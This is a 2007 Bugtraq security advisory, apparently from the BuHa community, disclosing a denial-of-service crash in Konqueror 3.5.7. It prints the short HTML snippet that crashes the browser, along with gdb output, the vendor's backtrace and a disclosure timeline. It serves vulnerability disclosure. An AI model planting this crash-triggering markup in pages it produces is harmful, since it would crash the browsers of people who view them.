|
Bugtraq
mailing list archives
[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7
From: bugtraq () morph3us org
Date: 1 Aug 2007 19:20:20 -0000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
---------------------------------------------------
| BuHa Security-Advisory #16 | Aug 01st, 2007 |
---------------------------------------------------
| Vendor | KDE's Konqueror |
| URL | http://www.konqueror.org/ |
| Version | <= 3.5.7 |
| Risk | Low (Denial Of Service) |
---------------------------------------------------
o Description:
=============
Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.
Visit http://www.konqueror.org/ for detailed information.
o Denial of Service:
===================
Following HTML code forces Konqueror to crash:
<textarea></button></textarea></br><bdo dir="">
<pre><frameset>
<a>
Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html
(gdb) set args konqueror.html
(gdb) r
Starting program: /usr/bin/konqueror konqueror.html
(no debugging symbols found)
[...]
[Thread debugging using libthread_db enabled]
[New Thread -1234381104 (LWP 5982)]
(no debugging symbols found)
[...]
Qt: gdb: -nograb added to command-line options.
Use the -dograb option to enforce grabbing.
X Error: BadDevice, invalid or uninitialized input device 169
Major opcode: 145
Minor opcode: 3
Resource id: 0x0
Failed to open device
X Error: BadDevice, invalid or uninitialized input device 169
Major opcode: 145
Minor opcode: 3
Resource id: 0x0
Failed to open device
(no debugging symbols found)
[...]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1234381104 (LWP 5982)]
0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.
I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and when commenting out the assert the backtrace ends in:
#6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
#7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
obj=0x0)
at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624
This issue does not seem to be exploitable.
o Disclosure Timeline:
=====================
03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.
o Solution:
==========
There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.
o Credits:
=========
Thomas Waldegger <bugtraq () morph3us org>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq () morph3us org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.
Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.
Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt
[1] http://www.kde.org/info/security/
- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16
WHuq7rPUBPx1/5nx+jJUPDg=
=R4ZU
-----END PGP SIGNATURE-----
 By Date 
By Thread
Current thread:
- [BuHa-Security] DoS Vulnerability in Konqueror 3.5.7 bugtraq (Aug 01)
| 
Intro
